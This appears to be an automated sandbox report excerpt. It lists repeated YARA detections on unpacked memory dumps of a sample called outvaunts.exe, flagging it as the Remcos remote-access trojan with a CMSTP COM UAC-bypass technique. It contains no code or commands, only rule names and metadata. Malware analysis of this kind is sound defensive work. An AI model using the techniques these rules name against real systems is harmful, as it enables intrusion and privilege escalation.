              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.outvaunts.exe.1100000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.outvaunts.exe.11b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 34.2.outvaunts.exe.1180000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.outvaunts.exe.f30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.outvaunts.exe.800000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.outvaunts.exe.fd0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 26.2.outvaunts.exe.1130000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.outvaunts.exe.fd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 27.2.outvaunts.exe.2930000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 38.2.outvaunts.exe.1120000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 6.2.outvaunts.exe.690000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.outvaunts.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 32.2.outvaunts.exe.1160000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 38.2.outvaunts.exe.1120000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.outvaunts.exe.10d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 16.2.outvaunts.exe.11a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.outvaunts.exe.770000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.outvaunts.exe.770000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 35.2.outvaunts.exe.10f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 30.2.outvaunts.exe.1190000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 18.2.outvaunts.exe.1230000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 36.2.outvaunts.exe.670000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.outvaunts.exe.1140000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.outvaunts.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
